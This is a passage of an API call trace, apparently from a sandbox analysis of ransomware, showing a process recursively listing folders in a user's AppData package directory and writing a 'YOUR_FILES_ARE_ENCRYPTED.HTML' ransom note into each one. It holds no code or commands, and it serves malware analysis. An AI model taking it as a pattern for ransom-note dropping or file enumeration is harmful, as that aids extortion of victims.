dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.967] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.968] CloseHandle (hObject=0x31c) returned 1 [0120.968] GetProcessHeap () returned 0x600000 [0120.968] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.968] GetProcessHeap () returned 0x600000 [0120.968] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.968] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9d45e7c4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d45e7c4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d45e7c4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0120.968] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.968] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetHistory") returned 108 [0120.968] GetProcessHeap () returned 0x600000 [0120.968] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.968] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetHistory" [0120.968] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetHistory\\*" [0120.968] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9d45e7c4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d45e7c4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d45e7c4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x314d2b8, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0120.969] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9d45e7c4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d45e7c4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d45e7c4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x314d2b8, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0120.969] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9d45e7c4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d45e7c4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d45e7c4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x314d2b8, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0120.969] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0120.969] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 138 [0120.969] GetProcessHeap () returned 0x600000 [0120.969] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.969] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxidentityprovider_cw5n1h2txyewy\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.970] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.970] CloseHandle (hObject=0x31c) returned 1 [0120.971] GetProcessHeap () returned 0x600000 [0120.971] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.971] GetProcessHeap () returned 0x600000 [0120.971] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.971] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d45e7c4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d45e7c4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d45e7c4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="Temp", cAlternateFileName="")) returned 1 [0120.971] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.971] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\Temp") returned 101 [0120.971] GetProcessHeap () returned 0x600000 [0120.971] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.971] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\Temp" [0120.971] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\Temp\\*" [0120.971] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d45e7c4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d45e7c4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d45e7c4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x314d2b8, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0120.971] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d45e7c4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d45e7c4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d45e7c4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x314d2b8, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0120.971] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d45e7c4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d45e7c4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d45e7c4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x314d2b8, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0120.971] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0120.971] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0120.971] GetProcessHeap () returned 0x600000 [0120.971] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxidentityprovider_cw5n1h2txyewy\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.972] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.973] CloseHandle (hObject=0x31c) returned 1 [0120.973] GetProcessHeap () returned 0x600000 [0120.973] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.973] GetProcessHeap () returned 0x600000 [0120.973] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.973] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d45e7c4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d45e7c4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d45e7c4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="Temp", cAlternateFileName="")) returned 0 [0120.973] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.973] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0120.973] GetProcessHeap () returned 0x600000 [0120.973] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0120.974] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxidentityprovider_cw5n1h2txyewy\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.974] WriteFile (in: hFile=0x320, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.975] CloseHandle (hObject=0x320) returned 1 [0120.975] GetProcessHeap () returned 0x600000 [0120.975] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0120.975] GetProcessHeap () returned 0x600000 [0120.975] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.976] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d4383e5, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d4383e5, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d4383e5, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0120.976] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.976] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AppData") returned 101 [0120.976] GetProcessHeap () returned 0x600000 [0120.976] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.977] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AppData" [0120.977] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AppData\\*" [0120.977] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d4383e5, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d4383e5, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d4383e5, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.977] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d4383e5, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d4383e5, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d4383e5, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.977] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d4383e5, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d4383e5, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d4383e5, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0120.978] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.978] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0120.978] GetProcessHeap () returned 0x600000 [0120.978] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0120.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxidentityprovider_cw5n1h2txyewy\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.979] WriteFile (in: hFile=0x320, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.980] CloseHandle (hObject=0x320) returned 1 [0120.980] GetProcessHeap () returned 0x600000 [0120.980] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0120.980] GetProcessHeap () returned 0x600000 [0120.980] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.981] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d41224c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d41224c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d41224c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0120.981] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.981] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\LocalCache") returned 104 [0120.981] GetProcessHeap () returned 0x600000 [0120.981] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.981] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\LocalCache" [0120.981] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\LocalCache\\*" [0120.982] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d41224c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d41224c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d41224c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.982] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d41224c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d41224c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d41224c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.982] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d41224c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d41224c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d41224c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0120.982] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.982] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 134 [0120.982] GetProcessHeap () returned 0x600000 [0120.982] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0120.983] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxidentityprovider_cw5n1h2txyewy\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.983] WriteFile (in: hFile=0x320, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.984] CloseHandle (hObject=0x320) returned 1 [0120.984] GetProcessHeap () returned 0x600000 [0120.984] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0120.984] GetProcessHeap () returned 0x600000 [0120.984] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.984] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d41224c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d41224c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d41224c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0120.984] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.984] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\LocalState") returned 104 [0120.985] GetProcessHeap () returned 0x600000 [0120.985] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.985] lstrcpyW (in: lpString1=0x313b008, 